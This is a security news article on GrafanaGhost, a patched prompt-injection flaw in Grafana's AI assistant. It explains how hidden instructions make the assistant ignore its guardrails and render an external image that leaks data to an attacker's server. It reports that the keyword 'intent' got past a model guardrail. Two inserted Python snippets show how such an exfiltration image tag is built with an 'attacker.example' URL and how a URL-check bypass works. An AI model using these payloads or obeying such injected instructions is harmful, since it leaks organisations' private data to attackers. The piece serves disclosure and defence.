GrafanaGhost: Attackers Can Abuse Grafana to Leak Enterprise Data
GrafanaGhost vulnerability allows attackers to bypass Grafana AI safeguards and exfiltrate enterprise data via prompt injection.
Summary
Noma Security discovered GrafanaGhost, a vulnerability in Grafana's AI components that allows attackers to bypass client-side protections and exfiltrate sensitive enterprise data without user interaction. By crafting malicious prompts with indirect injection techniques and exploiting flaws in image URL validation, attackers can redirect Grafana's AI to leak data to external servers. Grafana has already patched the issue following responsible disclosure.
Full text
A vulnerability in how Grafana’s AI components process information could allow attackers to bypass the application’s safeguards and leak enterprise information, new research from Noma Security shows. An open source analytics and visualization application that ingests data from various sources, Grafana often has broad access to enterprise data, including financial metrics, infrastructure details, customer information, and telemetry.

The newly discovered vulnerability, named GrafanaGhost, allows attackers to bypass client-side protections and security guardrails and leak private data to external servers, exposing sensitive information in the background without user interaction. An attacker can exploit the weakness by targeting Grafana’s AI-based capabilities when a user interacts with a log entry. In the background, a malicious prompt triggers the issue, turning Grafana into the exfiltration vessel.

To mount the attack, a threat actor needs to craft a path pointing to external resources. When processed by Grafana, the log entry provides the attacker with access to the enterprise environment. Next, the attacker uses an indirect prompt injection hidden in the external context, instructing Grafana’s AI companion to ignore its guardrails and render an external image, forcing the system to acknowledge an external URL. When attempting to render the image, the AI companion makes a request to the attacker’s server, and the victim’s data is sent along as a URL parameter. “The data leaks the moment the system tries to display the image,” Noma says.

The issue, the cybersecurity firm discovered, was that the attacker could “fake the path of any company using Grafana” by guessing the data structure and model. Furthermore, an attacker could use a location where prompts would be saved within the application’s data store. From there, the attacker could abuse Grafana to exfiltrate data via image tags by crafting their prompts accordingly.
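The exfiltration pattern described above can be sketched in a few lines. This is a hypothetical illustration only: the attacker server, parameter name, and payload contents are invented for this sketch and do not reproduce the actual GrafanaGhost payload.

```python
from urllib.parse import quote

# Hypothetical attacker infrastructure (not from the research).
ATTACKER_SERVER = "https://attacker.example/collect"

def build_injection_payload(stolen_context: str) -> str:
    """Build a markdown image tag whose URL carries data as a query
    parameter; when a renderer fetches the image, the data leaves with
    the request. This mirrors the class of technique described, not the
    exact payload."""
    exfil_url = f"{ATTACKER_SERVER}?d={quote(stolen_context)}"
    return f"![chart]({exfil_url})"

payload = build_injection_payload("internal-db=prod;user=admin")
print(payload)
```

The key point the sketch shows is that no click or download is needed: the act of rendering the image markdown is itself the outbound request that leaks the data.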
While Grafana has protections in place that prevent the loading of images from external domains, a flaw in a function that validates image URLs could be exploited to bypass the protection. The AI model also has guardrails in place to prevent the injection of prompts that contain image markdown, but Noma discovered that the keyword “intent” could be used to bypass the protection and signal to the model that the instruction was legitimate.

“Chaining these discoveries together, we achieved automatic data exfiltration with zero user interaction. Data exfiltration occurs entirely in the background. To the data team, DevSecOps, or CISO, it looks like a typical day of data visualization,” Noma notes, adding that Grafana addressed the weaknesses immediately after being notified.

According to BeyondTrust deputy CISO Bradley Smith, the use of indirect prompt injections to exfiltrate data via rendered content is a well-known attack vector, but the exploitability against a hardened Grafana deployment is less clear. “The practical exploitability depends heavily on deployment specifics; whether AI features are enabled, whether egress controls are in place, and how the environment handles external data ingestion. This isn’t a universal bypass of Grafana; it’s a demonstration of what can happen when AI components process untrusted input without sufficient architectural controls around them,” Smith said.

According to Acalvio CEO Ram Varadarajan, GrafanaGhost illustrates that the broad adoption of AI has shifted defenses beyond the application layer, requiring network-level URL blocking and hardening AI against prompt injection. “Ultimately, this exploit proves that perimeter controls are insufficient. The only way to secure AI-driven tooling is to shift from monitoring what an agent is told to performing runtime behavioral monitoring of what it actually does,” Varadarajan said.
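The research does not publish the flawed validation function, but the general class of image-URL validation bug it describes can be illustrated with an assumed example. The allowed host, the naive check, and the bypass URL below are all hypothetical; the point is only how a string-based check differs from a parsed-hostname check.

```python
from urllib.parse import urlparse

# Hypothetical allowlisted host (not Grafana's actual configuration).
ALLOWED_HOST = "grafana.example.com"

def is_allowed_naive(url: str) -> bool:
    # Flawed pattern: checks that the allowed host appears somewhere
    # in the URL string, rather than being the actual hostname.
    return ALLOWED_HOST in url

def is_allowed_strict(url: str) -> bool:
    # Safer pattern: parse the URL and compare the hostname exactly.
    return urlparse(url).hostname == ALLOWED_HOST

# The allowed host appears in the *path*, so the real request goes
# to attacker.example while the naive check still passes.
bypass = f"https://attacker.example/{ALLOWED_HOST}/img.png"
print(is_allowed_naive(bypass))   # naive check wrongly accepts the URL
print(is_allowed_strict(bypass))  # strict check rejects it
```

Embedding an allowed domain in the path or in a crafted subdomain is a common way such substring-style validators are defeated, which is why exact hostname comparison after parsing is the usual remediation.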
Related: Google DeepMind Researchers Map Web Attacks Against AI Agents
Related: Why Agentic AI Systems Need Better Governance – Lessons from OpenClaw
Related: AI, APIs and DDoS Collide in New Era of Coordinated Cyberattacks
Related: Vulnerability Allowed Hijacking Chrome’s Gemini Live AI Assistant
Written by Ionut Arghire, an international correspondent for SecurityWeek.
Indicators of Compromise
- vulnerability — GrafanaGhost